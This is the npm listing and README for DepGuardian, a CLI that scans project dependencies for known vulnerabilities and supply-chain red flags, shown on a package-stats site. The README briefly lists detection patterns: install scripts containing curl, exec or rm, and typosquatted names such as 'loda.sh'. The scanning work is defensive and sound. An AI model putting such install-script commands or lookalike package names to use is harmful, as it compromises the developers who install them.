npm package discovery and stats viewer.

Discover Tips

  • General search

    [free text search, go nuts!]

  • Package details

    pkg:[package-name]

  • User packages

    @[username]

Sponsor

Optimize Toolset

I’ve always been into building performant and accessible sites, but lately I’ve been taking it extremely seriously. So much so that I’ve been building a tool to help me optimize and monitor the sites that I build to make sure that I’m making an attempt to offer the best experience to those who visit them. If you’re into performant, accessible and SEO friendly sites, you might like it too! You can check it out at Optimize Toolset.

About

Hi, 👋, I’m Ryan Hefner  and I built this site for me, and you! The goal of this site was to provide an easy way for me to check the stats on my npm packages, both for prioritizing issues and updates, and to give me a little kick in the pants to keep up on stuff.

As I was building it, I realized that I was actually using the tool to build the tool, and figured I might as well put this out there and hopefully others will find it to be a fast and useful way to search and browse npm packages as I have.

If you’re interested in other things I’m working on, follow me on Twitter or check out the open source projects I’ve been publishing on GitHub.

I am also working on a Twitter bot for this site to tweet the most popular, newest, random packages from npm. Please follow that account now and it will start sending out packages soon–ish.

Open Software & Tools

This site wouldn’t be possible without the immense generosity and tireless efforts from the people who make contributions to the world and share their work via open source initiatives. Thank you 🙏

© 2025 – Pkg Stats / Ryan Hefner

depguardian-cli

v1.1.0

Published

CLI that scans your npm dependencies with OSV (and optionally Snyk), highlights known vulnerabilities, and surfaces a few supply-chain red flags

Vulnerabilities

Powered byPowered by Snyk
  • 0High
  • 0Medium
  • 0Low

Links

Git

Maintainers

quefepquefep

Keywords

securityvulnerabilitynpmdependenciessupply-chainauditscannergithub-actioncli

Readme

DepGuardian

npm version License: MIT

DepGuardian is a small CLI I built to keep npm projects from quietly drifting into dependency trouble. It scans your dependencies with OSV (and optionally Snyk), flags a few obvious supply-chain red flags, and can generate an HTML report you can drop into a pull request or share with your team.

🚀 Quick Start

# Install DepGuardian
npm install -g depguardian-cli

# Scan your project
depguardian scan

# Check a specific package
depguardian check lodash

# Initialize configuration
depguardian init

# Generate HTML report
depguardian scan . --html

# Watch mode for continuous monitoring
depguardian watch

📋 Commands

  • scan [path] - Scan project for vulnerabilities
  • check <package> - Check specific package for vulnerabilities
  • init - Initialize configuration file
  • watch [path] - Watch mode for continuous monitoring

HTML Report Generation

# Generate interactive HTML report
depguardian scan . --html

# Output: depguardian-report.html

CI/CD Integration

# Copy GitHub Actions template
cp templates/github-actions.yml .github/workflows/depguardian.yml

# Copy GitLab CI template  
cp templates/gitlab-ci.yml .gitlab-ci.yml

Snyk Integration

{
  "snyk": {
    "enabled": true,
    "token": "${SNYK_TOKEN}",
    "organization": "your-org",
    "endpoint": "https://api.snyk.io"
  }
}

What DepGuardian does today

DepGuardian is still young, but it already does a few useful things:

  • Scans your package.json and lockfile (npm, pnpm, yarn) to figure out which packages you actually depend on.
  • Looks up known vulnerabilities via the OSV API, and can also talk to Snyk if you give it a token.
  • Runs a simple supply-chain check over your dependency list (typosquatting-style names, suspicious install scripts, unusual publish patterns, single-maintainer packages).
  • Generates an HTML report you can drop into a pull request or share with your team.
  • Lets you run quick, one-off checks for a single package from the CLI.

There are also a couple of integrations that exist in the codebase but are still settling:

  • A SafeUpgradeCalculator that tries to suggest a reasonable target version and gives you a rough risk/confidence score.
  • A GitHub helper that can open security PRs based on those upgrade paths.
    • The CLI flags --pr and --fix are currently placeholders and just print a warning; the underlying code is there if you want to wire it up yourself.

🚨 Supply Chain Security

DepGuardian now includes advanced supply chain threat detection:

Threat Types Detected:

  • Typosquatting: Packages with names similar to popular packages (e.g., loda.sh vs lodash)
  • Malicious Scripts: Suspicious patterns in install scripts (curl, exec, rm, etc.)
  • Suspicious Activity: Rapid version releases, very new packages
  • Compromised Maintainers: Suspicious emails, single maintainer packages

Example Output:

🚨 Supply Chain Threats:
Total threats: 3

HIGH (2):
  • loda.sh - typosquatting
  • malicious-pkg - malicious-script

LOW (1):
  • single-maintainer - compromised-maintainer

📦 Dependencies

  • Node.js 18+
  • TypeScript 5.3+
  • Commander.js for CLI
  • Chalk for terminal styling
  • Ora for spinners
  • OSV API for vulnerability data

🧪 Testing

# Run tests
npm test

# Run with coverage
npm run test:coverage

# Build project
npm run build

# Lint code
npm run lint

# Format code
npm run format

📄 License

MIT License - see LICENSE file for details.

DepGuardian - Your npm dependency security guardian. Protecting your projects from vulnerabilities and supply chain attacks.